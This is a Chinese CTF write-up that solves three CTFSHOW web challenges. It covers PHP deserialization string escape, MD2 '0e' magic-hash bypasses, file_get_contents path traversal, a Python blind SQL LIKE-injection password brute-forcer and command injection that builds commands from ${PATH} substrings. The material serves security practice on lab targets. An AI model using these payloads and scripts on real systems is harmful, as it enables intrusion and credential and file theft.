【Web】CTFSHOW 月饼杯 题解(全)

目录

web1_此夜圆

web2_故人心

web3_莫负婵娟


web1_此夜圆

拿到源码,一眼字符串逃逸

本地测一测,成功弹出计算器

<?phpclass a
{public $uname;public $password;public function __wakeup(){system('calc');}
}function filter($string){return str_replace('Firebasky','Firebaskyup',$string);
}$uname="Z3r4yFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky\";s:8:\"password\";s:5:\"yu22x\";}";
$password=1;
echo serialize(new a($uname,$password));
echo strlen("\";s:8:\"password\";s:5:\"yu22x\";}");
echo filter(serialize(new a($uname,$password)));
unserialize(filter(serialize(new a($uname,$password))));
?>

最终payload:

?1=Z3r4yFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web2_故人心 

 第一层用高精度绕过

<?php
for ($i = 1; $i <= 999; $i++) {$a="1e-".$i;if($a**2==0){echo $i; //162break;}
}

访问./robots.txt

访问./hinthint.txt

脚本爆可以0e绕过的值,$b要爆3位,$c要爆4位

<?php
for ($i=100;$i<=999;$i++){$b = "0e".$i."024452";if($b==hash("md2", $b)){echo $b;}
}
//b=0e652024452
echo "\n";
for ($i=1000;$i<=9999;$i++){$c = "0e".$i."48399";if($c==hash("md2",hash("md2", $c))){echo $c;}
}
//c=0e603448399

payload:

?a=1e-162&b=0e652024452&c=0e603448399

得知flag位置

关于url的绕过

php中file_get_contents使用不存在的协议名可以目录穿越读文件

post传参

url=suibian://ctfshow.com/../../../../../../../../fl0g.txt

web3_莫负婵娟

进入题目右键查看源码,一眼sql注入

 

like 模糊匹配

% 表示零个或多个字符的任意字符串
_(下划线)表示任何单个字符
[ ] 表示指定范围 ([a-f]) 或集合 ([abcdef]) 中的任何单个字符
[^] 不属于指定范围 ([a-f]) 或集合 ([abcdef]) 的任何单个字符
* 它同于DOS命令中的通配符,代表多个字符
?同于DOS命令中的?通配符,代表单个字符
# 大致同上,不同的是只能代表单个数字

payload:

________________________________

测出密码长度为32

 

脚本爆出密码

import requestsa="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
url = 'http://dc852120-5466-4972-809e-10b7c7f6107a.challenge.ctf.show/login.php' #需要修改处;
pwd = ''
for i in range(32):print('i = '+str(i+1),end='\t')for j in a:password = pwd + j + (31 - i) * '_'data = {'username':'yu22x','password':password}r = requests.post(url,data=data)if 'wrong' not in r.text:pwd += jprint(pwd)break

yu22x / 67815b0c009ee970fe4014abaa3Fa6A0登录成功

一眼八股,但小写字母都被waf掉了,用提示中的环境变量+linux字符串截取来构造

${PATH:x:y} 是一种 Bash shell 中的参数替换语法,它从变量 PATH 中提取一个子字符串,并根据提供的参数进行操作。

  • x 是一个非负整数,表示提取子字符串的起始位置。位置从0开始计数,即第一个字符的位置为0。

  • y 是一个非负整数,表示提取的子字符串的长度。

${PATH:x:y} 将会从 PATH 变量中提取一个子字符串,从位置 x 开始,并且提取长度为 y 的部分。

例如,${PATH:2:3} 将会提取 PATH 变量中的第3、第4和第5个字符组成的子字符串。

127.0.0.1;${PATH:5:1}${PATH:2:1}

127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/3032405.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

使用 sudo apt upgrade 出现的提示

┌────────────────────────────────────────────────┤ Pending kernel upgrade ├────────────────────────────────────────────────┐ │ …

活字格中如何调用第三方应用程序

在活字格有一种方法可以让我们的程序去执行其他程序&#xff0c;比如.bat或.exe文件。这就是所谓的"服务端调用外部程序"。 操作步骤如下&#xff1a; 1. 找到对象管理器中的服务端命令&#xff0c;右键点击它&#xff0c;选择"创建服务端命令"&#xff…

Codeforces Round 944 (Div. 4)

Codeforces Round 944 (Div. 4) Codeforces Round 944 (Div. 4) A. My First Sorting Problem 思路&#xff1a;久违的比大小 AC code&#xff1a; void solve() {int x, y; cin>> x >> y;cout << min(x, y) << " " << max(x, y…

2024年最新趋势跨境电商平台开发需了解的新技术

随着数字化技术的不断演进和全球市场的日益融合&#xff0c;跨境电商平台开发将面临前所未有的挑战和机遇。为了更好地适应并引领这一发展&#xff0c;开发者需要密切关注2024年最新的技术趋势&#xff0c;以确保他们的平台能够在竞争激烈的市场中脱颖而出。本文将对跨境电商平…

【静态分析】软件分析课程实验A3-死代码检测

官网&#xff1a; 作业 3&#xff1a;死代码检测 | Tai-e 参考&#xff1a; https://www.cnblogs.com/gonghr/p/17981720 --------------------------------------------------------------------- 1 作业导览 为 Java 实现一个死代码&#xff08;dead code&#xff09;检…

Jenkins流水线部署Maven项目

使用Jenkins的流水线功能&#xff0c;构建部署Java Maven项目&#xff0c;步骤很简单但是不少细节需要注意。 一、安装 Jenkins的安装步骤和流程就不具体描述&#xff0c;这里主要介绍一下安装时要注意的几个问题。 1、Jenkins尽量安装最新的几个版本&#xff0c;否则安装完成…

6个超TM好用的神仙App推荐!

1. AI文本视频生成工具——Jurilu Jurilu 是一款功能强大的 AI 文本视频生成器&#xff0c;允许用户快速将文本内容转换成极具吸引力的视频。它的使用非常简单&#xff1a;只需要输入文字&#xff0c;选择想要的样式和模板&#xff0c;Jurilu 就会自动将文字转换成生动的视频。…

【C语言】/*操作符(下)*/

目录 一、操作符的分类 二、二进制和进制转换 2.1 进制 2.2 进制之间的转换 三、原码、反码、补码 四、单目操作符 五、逗号表达式 六、下标引用操作符[] 七、函数调用操作符() 八、结构体成员访问操作符 8.1 直接访问操作符(.) 8.2 间接访问操作符(->) 九、操作符…

干货教程【AI篇】| 目前全球最强AI换脸工具swapface详细图文教程及整合包下载

需要这个工具整合包的小伙伴可以关注一下文章底部公众号&#xff0c;回复关键词【swapface】即可获取。 从我们的链接下载&#xff0c;得到这个exe文件 双击运行即可进入安装界面 如下图所示已经在安装中啦 安装好之后我们根据上面的安装路径找到要执行的文件 双击红框中的…

Doris【部署 01】Linux部署MPP数据库Doris稳定版(下载+安装+连接+测试)

本次安装测试的为稳定版2.0.8官方文档 https://doris.apache.org/zh-CN/docs/2.0/get-starting/quick-start 这个简短的指南将告诉你如何下载 Doris 最新稳定版本&#xff0c;在单节点上安装并运行它&#xff0c;包括创建数据库、数据表、导入数据及查询等。 Linux部署稳定版Do…

Excel-VBA报错01-解决方法

【已删除的部件:部件/xl/vbaProject.bin。(Visual Basic for Applications(VBA))】 1.问题复现&#xff1a; Win10 &#xff1b;64位 &#xff1b;Office Excel 2016 打开带有宏的Excel文件&#xff0c;报错&#xff1a;【已删除的部件&#xff1a;部件/xl/vbaProject.bin。…

MFC DLL注入失败一些错误总结

使用cheat Engine为MFC窗口程序注入DLL时一定要注意&#xff0c;被注入的exe程序和注入的DLL 的绝对路径中一定不要带有中文字符&#xff0c;否则会遇到各种各样的奇怪错误&#xff0c;如下所示&#xff1a; 以下是dll绝对路径中均含有中文字符&#xff0c;会报错误&#xff…

一种简单的小报表本地缓存方案

适应如下场景&#xff1a;关联表多&#xff0c;接口响应慢&#xff0c;报表数据不多&#xff0c;可能就十多行。参数也固定&#xff0c;实时性要求不高&#xff0c;隔那么半小时刷新一次&#xff0c;查询性能要求高&#xff0c;给领导看的&#xff0c;要求很快。 使用示例&…

【桌面应用开发】Rust+Tauri框架项目打包操作

1.项目npm install下载项目依赖&#xff08;需要配置好node.js环境&#xff09; 可参考&#xff1a;https://blog.csdn.net/m0_64346565/article/details/138319651 2.自定义图标&#xff08;项目初始化开始第一次需要配置生成&#xff0c;后面可跳过这一步骤&#xff09; Ta…

ITIL4视角下的IT监控与故障管理:守护服务健康的双刃剑

引言&#xff1a;监控的曙光 在IT服务管理的浩瀚星图中&#xff0c;"监控"这一璀璨星辰终于得到了应有的重视与聚焦。ITIL4的出台&#xff0c;不仅明确将监控告警纳入事件管理的广阔宇宙&#xff0c;而且强调了其在预防故障、保障服务连续性中的核心地位。当组织拥抱…

k8s设置在任意node里执行kubectl 命令

一、问题 正常来讲kubectl 只能在master node 里运行 当我们尝试在某个 node 节点来执行时&#xff0c; 通常会遇到下面错误 执行错误&#xff1a;The connection to the server localhost:8080 was refused - did you specify the 原因&#xff1a;因为k8s的各个组建&#xf…

Oracle 多表查询

关联查询 一、sql:1992语法的连接笛卡尔积等值连接非等值连接自连接外连接 二、sql:1999语法的连接交叉连接自然连接USING创建连接ON创建连接左外连接右外连接FULL OUTER JOININNER JOIN 三、子查询子查询的种类单行子查询多行子查询 在From字句中使用子查询练习 四、行转列 一…

小兴教你做平衡小车-平衡车主板绘制(V4版本 b站课程所使用版本)

文章目录 1 原理图总览2 原理图各模块细致图2.1 2.54mm插针(stm32最小系统扩展接口)2.2 OLED显示2.3 MPU60502.4 TB6612驱动电路2.5 2.54mm排座(stm32最小系统连接接口)2.6 测距模块2.7 蓝牙模块2.8 蜂鸣器模块2.9 电池电压检测电路2.10 M3固定孔2.11 用户小灯模块2.12 电源接口…

在go-zero中使用jwt

gozero使用jwt 两个步骤 获取token验证token 前端获取token 先编写 jwt.api 文件&#xff0c;放在api目录下 syntax "v1"info (title: "type title here"desc: "type desc here"author: "type author here"email: &quo…

无限集中的最小数字

题目链接 无限集中的最小数字 题目描述 注意点 1 < num < 1000 解答思路 由题意得&#xff0c;可以理解为最初集合中有1~1000之间的所有数字&#xff0c;如果集合中存在数字&#xff0c;则添加时不会有任何操作&#xff1b;在移除集合中的元素时&#xff0c;会按顺序…